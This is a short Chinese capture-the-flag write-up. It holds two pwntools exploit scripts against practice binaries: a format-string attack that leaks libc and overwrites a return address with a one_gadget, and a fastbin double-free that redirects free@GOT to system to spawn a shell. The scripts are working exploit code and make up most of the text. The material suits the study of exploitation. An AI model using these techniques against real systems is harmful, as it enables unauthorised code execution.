foooood(跟我的题思路一模一样,气死)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
from pwn import *
context(os='linux',arch='amd64')  #need tmux
context.log_level="debug"

# p = remote("node4.buuoj.cn", 26443)
p = process("./pwn")
p.sendlineafter("Give me your name:", b"/bin/sh")

p.sendlineafter("food:", b'%9$p^%11$p^')
libc_base = int(p.recvuntil("^")[10:-1], 16) - 0x20750 - 240  # __libc_start_main
stack = int(p.recvuntil("^")[:-1], 16)
i_addr = stack - 0x7ffc0bd8af08 + 0x7ffc0bd8ae40
one = libc_base + 0x45226
print(hex(one))
p.sendlineafter("food:", "%{}p%11$hn".format((i_addr - 0x30 + 4) & 0xffff))
# attach(p)
p.sendlineafter("food:", "%{}p%37$hhn".format(1))

p.sendlineafter("food:", "%{}p%11$hn".format((i_addr - 0x18) & 0xffff))
# attach(p)
p.sendlineafter("food:", "%{}p%37$hn".format(one & 0xffff))

p.sendlineafter("food:", "%{}p%11$hn".format((i_addr - 0x18 + 2) & 0xffff))
# attach(p)
p.sendlineafter("food:", "%{}p%37$hhn".format((one & 0xff0000) // 0x10000))
for i in range(8):
    p.sendlineafter("food:", "1")
# attach(p)
p.sendlineafter("food:", "1")
print(hex(libc_base))
p.interactive()

easynote(两个大洞,但one不通)

uaf和堆溢出都有做法挺多,后面试试

1.改堆指针表,写free_got,free一个“/bin/sh”(我的exp)

2.reaclloc调栈,跳malloc_hook的one

3.unlinlk

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
from pwn import *

context(arch='i386', log_level='debug', os='linux')
elf=ELF("./pwn")


def malloc(size, contet):
    p.sendlineafter("5. exit", b'1')
    p.sendlineafter("--->", str(size))
    p.sendafter("--->", contet)
def free(id):
    p.sendlineafter("5. exit", b'3')
    p.sendlineafter("--->", str(id))

def edit(id,size,contet):
    p.sendlineafter("5. exit", b'2')
    p.sendlineafter("--->", str(id))
    p.sendlineafter("--->", str(size))
    p.sendafter("--->", contet)

def show(id):
    p.sendlineafter("5. exit", b'4')
    p.sendlineafter("--->", str(id))


# p = process('./pwn')
p = remote('node4.buuoj.cn', 26517)
libc = ELF('libc-2.23.so')
malloc(0x80, b'qwer')
malloc(0x80, b'qwer')
malloc(0x68, b'qwer')
malloc(0x68, b'qwer')
malloc(0x68, b'/bin/sh')

free(0)
show(0)
p.recvuntil(":")
libc_base = u64(p.recv(7)[1:] + b'\0' * 2) - 0x7fef613c4b78 + 0x7fef61000000
system = libc_base + libc.sym["system"]
free_got = elf.got['free']
# pause()
free(2)
free(3)
free(2)
malloc(0x68, p64(0x0000000006020C0 - 0x23))
malloc(0x68, 'ase')
malloc(0x68, 'ase')
print(hex(libc_base))
print(hex(free_got))
malloc(0x68, b'a' * (0x23 - 0x10) + p64(free_got))
# attach(p)
edit(0, 10, p64(system))
p.sendlineafter("5. exit", b'3')
p.sendlineafter("--->", b'4')
p.interactive()